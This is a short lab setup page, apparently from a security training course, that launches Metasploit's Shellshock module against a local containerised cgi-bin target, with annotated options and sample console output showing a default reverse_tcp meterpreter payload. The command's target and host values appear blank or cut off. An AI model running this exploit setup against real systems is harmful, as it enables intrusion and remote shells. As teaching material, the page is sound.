Metasploit Setup

To create a metasploit terminal within your code-server instance, follow these instructions

We are going to run metasploit as a non-root user in another terminal which we’ll refer to as Terminal 2 in the tabs below. If you haven’t already, you can split your terminal to open a new, non-root, shell

terminal split annotated
Figure 1. Terminal Split button

Then run the following commands in the newly created terminal:

  • Terminal 2

  1. Start up metasploit in your terminal by running the following command:

    msfconsole \
        -x \(1)
    "use multi/http/apache_mod_cgi_bash_env_exec; (2)
    set RHOSTS; (3)
    set LHOST $(dig +short" (4)
    1 The -x option allows us to pass commands directly into metasploit (see following explanations of each). We use this to save setup time
    2 This is a metasploit module that plugs into the console. There is a whole library of modules that are used with metasploit. This one specifically targets the shellshock vulnerability via Apache’s cgi-bin support
    3 This is the address of the server target URL of a cgi-bin script (which we’re running locally in a container)
    4 The public ip address of the VM instance (as reported by dig). This is necessary for how metasploit works

    If asked if you want to setup a new database, answer no

    Would you like to use and setup a new database (recommended)?

  2. When it’s done initializing, you should see output something like this (ASCII art, "tip", and LHOST will vary)

     ** Welcome to Metasploit Framework Initial Setup **
        Please answer a few questions to get started.
    Would you like to use and setup a new database (recommended)? no
     ** Metasploit Framework Initial Setup Complete **
     _                                                    _
    / \    /\         __                         _   __  /_/ __
    | |\  / | _____   \ \           ___   _____ | | /  \ _   \ \
    | | \/| | | ___\ |- -|   /\    / __\ | -__/ | || | || | |- -|
    |_|   | | | _|__  | |_  / -\ __\ \   | |    | | \__/| |  | |_
          |/  |____/  \___\/ /\ \\___/   \/     \__|    |_\  \___\
           =[ metasploit v6.2.9-dev-                          ]
    + -- --=[ 2229 exploits - 1177 auxiliary - 398 post       ]
    + -- --=[ 864 payloads - 45 encoders - 11 nops            ]
    + -- --=[ 9 evasion                                       ]
    Metasploit tip: You can pivot connections over sessions
    started with the ssh_login modules
    [*] No payload configured, defaulting to linux/x86/meterpreter/reverse_tcp
    RHOSTS =>
    LHOST =>
    msf6 exploit(multi/http/apache_mod_cgi_bash_env_exec) >

Now you can close this window and go back to the lab instructions.